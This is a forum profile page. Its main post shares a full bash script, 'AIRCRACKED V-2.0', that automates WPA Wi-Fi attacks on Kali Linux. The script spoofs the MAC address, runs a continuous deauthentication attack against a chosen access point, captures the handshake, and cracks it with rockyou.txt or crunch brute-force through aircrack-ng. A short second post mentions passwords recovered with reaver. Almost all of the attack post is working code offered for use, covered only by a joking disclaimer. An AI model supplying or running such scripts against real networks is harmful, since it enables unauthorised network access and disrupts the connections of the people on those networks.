thisguysayswht
-
Posts
2 -
Joined
-
Last visited
Posts posted by thisguysayswht
-
-
This my first (more than 5 line) bash script. If you have any suggestions/tips for improvment, I'm all ears. Its designed to run on kali, but should be easily portable to other pentesting distros (or it might work right out of the box, idk i havent tested with anything else).
What it does:
1. Starts a moniter mode on the interface of your choosing.
2. Spoofs you MAC if you so desire.
3. Runs airodump-ng.
4. Prompts user for a BSSID/channel.
5. Creates a ~/Handshakes folder in your home directory.
6. Dumps the user specified network traffic to the created ~/Handshakes folder.
7. While dumping traffic opens an xterm window that deauthenticates the previously specified AP.
8. Asks the user if they would like to start again from step 3.
9. Shuts down mon0, changes back to perment mac (if they want).
10. Gives the user the a number of options for attacking the handshake with aircrack-ng, these include:
a) Running the preincluded rockyou.txt in kali (automaticlly decompresses).
b) A number of bruteforce attacks. (7 predefined options)
c) Allows the user to pass there own arguments to crunch.
RAW code:
#!/bin/bash clear echo "" #Configuration: HANDSHAKE='/root/Handshakes/HandShake*.cap' WORDLIST='/usr/share/wordlists/rockyou.txt' MONITER=mon0 #End configuration echo "***************************************" echo "***********AIRCRACKED V-2.0************" echo "***************************************" echo "** **" echo "** Wrtten by @thisguysayswht **" echo "** Email: hofmanjosh555@yahoo.com **" echo "** **" echo "** Usage: **" echo "** **" echo "** Starts moniter interface **" echo "** Spoofs MAC adderss **" echo "** Runs airodump-ng **" echo "** Creates Handshake directory **" echo "** Dumps specified network traffic **" echo "** Deauthenticates specified AP **" echo "** Captures handshake **" echo "** Restores wireless interfaces **" echo "** Runs aircrack-ng **" echo "** **" echo "***************************************" echo "***************************************" echo "" echo "" echo "========Press enter to continue========" read START if [[ $START == "" ]]; then sleep 2 clear fi #Use at your own risk... echo "---------------------------------------------------" echo "-Would you like to start a moniter interface[y/n]?-" echo "---------------------------------------------------" echo "" read MONIF if [[ $MONIF == 'y' ]]; then echo "" iwconfig echo "Please select a wireless interface from above" echo "" read WIRELESS [[ $WIRELESS == "" ]] sleep 2 clear echo "Starting interface on $WIRELESS..." sleep 2 airmon-ng start $WIRELESS sleep 4 clear else echo "" echo "Skipping..." sleep 2 clear fi echo "----------------------------------------" echo "-Would you like to spoof your MAC[y/n]?-" echo "----------------------------------------" echo "" read MACSPF if [[ $MACSPF == 'y' ]]; then echo "" echo "Shutting down all wireless interfaces..." echo "" sleep 2 ifconfig $WIRELESS down ifconfig $MONITER down echo "Changing to random MAC..." echo "" sleep 2 macchanger -r $WIRELESS macchanger -r $MONITER echo "" echo "Bringing spoffed interfaces up..." echo "" sleep 4 clear ifconfig $WIRELESS up ifconfig $MONITER up else echo "" echo "Skipping..." sleep 2 clear fi while true do clear echo "--------------------------------------------------" echo "-Would you like to dump the network traffic[y/n]?-" echo "--------------------------------------------------" echo "" read DUMP if [[ $DUMP == 'y' ]]; then echo "" echo "Dumping network traffic...[Ctrl-C to stop]" sleep 4 airodump-ng $MONITER else echo "" echo "Skipping..." sleep 2 clear fi echo "---------------------------------------------" echo "-Would you like to capture a handshake[y/n]?-" echo "---------------------------------------------" echo "" read HANDC if [[ $HANDC == 'y' ]]; then echo "" echo "Creating directory Handshakes..." echo "" sleep 2 cd ~ mkdir Handshakes &> /dev/null echo "" echo "Please enter the network BSSID:" echo "" read BSSID [[ $BSSID == "" ]] echo "" echo "Please enter the network channel:" echo "" read CHNEL [[ $CHNEL == "" ]] airodump-ng --ig -w Handshakes/HandShake -c $CHNEL --bssid $BSSID $MONITER & sleep 6 && xterm -hold -e "while true; do sleep 5; aireplay-ng -0 5 -q 2 --ig -a $BSSID $MONITER; done" && exec -c clear else echo "" echo "Skipping..." sleep 2 clear fi echo "---------------------------------------------------" echo "-Would you like to capture another handshake[y/n]?-" echo "---------------------------------------------------" echo "" read AGAIN if [[ $AGAIN == "n" ]]; then break echo "" echo "Skipping..." sleep 2 clear fi done clear echo "-----------------------------------------------------------------------" echo "-Would you like to restore your previous interface configuration[y/n]?-" echo "-----------------------------------------------------------------------" echo "" read RESTOR if [[ $RESTOR == "y" ]]; then echo "" echo "Disabling moniter mode..." sleep 2 airmon-ng stop $MONITER echo "Shutting down main wireless interface..." echo "" sleep 2 ifconfig $WIRELESS down echo "Restoring perment MAC..." echo "" sleep 2 macchanger -p $WIRELESS echo "" echo "Bringing main wireless interface back up..." echo "" sleep 2 ifconfig $WIRELESS up echo "Wireless interfaces restored" echo "" sleep 4 clear else echo "" echo "Skipping..." sleep 2 clear fi while true do clear echo "*****************************************************" echo "*******************Select option*********************" echo "*****************************************************" echo "** **" echo "** 1. View handshakes (Ctrl-C to exit) **" echo "** 2. Use rockyou.txt (4 hours) **" echo "** 3. Bruteforce 8 numeric (1 day 6 hrs) **" echo "** 4. Bruteforce 9 numeric (12 days) **" echo "** 5. Bruteforce 10 numeric (4 months) **" echo "** 6. Bruteforce 8 a-z (7 years) **" echo "** 7. Bruteforce 8 A-Z (7 years) **" echo "** 8. Bruteforce 8 a-z + numeric (91 years) **" echo "** 9. Bruteforce 8 A-Z + numeric (91 years) **" echo "** 10. Bruteforce 8 a-z + A-Z (1719 years) **" echo "** 11. Bruteforce custom (???) **" echo "** **" echo "*****************************************************" echo "**********All calculations done @1000 pmk/s**********" echo "*****************************************************" echo "" read n case $n in 1)(xterm -hold -e aircrack-ng $HANDSHAKE) & ;; 2)clear echo "Decompressing rockyou.txt..." gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null echo "" sleep 2 echo "Starting attack..." sleep 3 aircrack-ng -w $WORDLIST $HANDSHAKE echo "" read -p "Press any key to return to script";; 3)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 numeric" echo "" crunch 8 8 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 4)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 9 numeric" echo "" crunch 9 9 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 5)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 10 numeric" echo "" crunch 10 10 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 6)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z" echo "" crunch 8 8 abcdefghijklmnopqrstuvwxyz|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 7)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 A-Z" echo "" crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 8)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z numeric" echo "" crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 9)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 A-Z numeric" echo "" crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 10)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z A-Z" echo "" crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 11)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "What arguments would you like to pass to crunch?" echo "" read CRUNCH [[ $CRUNCH == "" ]] echo "" echo "Starting custom bruteforce attack" echo "" crunch $CRUNCH|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; *)clear echo "Invalid option" echo "" read -p "Press any key to return to script";; esac sleep 1 done
Executable:
Apparetly it wont let me upload "this kind of file", if anyone has a workaround let me know. For now just copy/paste into a text editor, save, and chmod -x /the/file in a terminal (or right click >permissions>allow executing of this file)
Disclaimer:
This code was written for educational purposes only.
I am not responsible for what you do with this code.
If this code sets your computer on fire, I am not responsible.
If you use this code irresponsibly, and the FBI kicks your door down, I am not responsible.
This code is designed to test the security of your router, and not anyone else's.
If this code gets you laid, I might take responsibility.
If you use this code, you are agreeing that it is at your own risk.
Reaver WPA letter case errors
in Hacks & Mods
Posted
Interesting, This is only in certin cases (version of reaver, specific routers), correct?
I ask beacuse I've recoverd a handfull of passwords with reaver (the default version in bt5 r3), and I rember one inperticular that was Passw0rd0590, and the case was correct in this instance.
Do you mind me asking what version of reaver, and what kind of router gave you guys this result?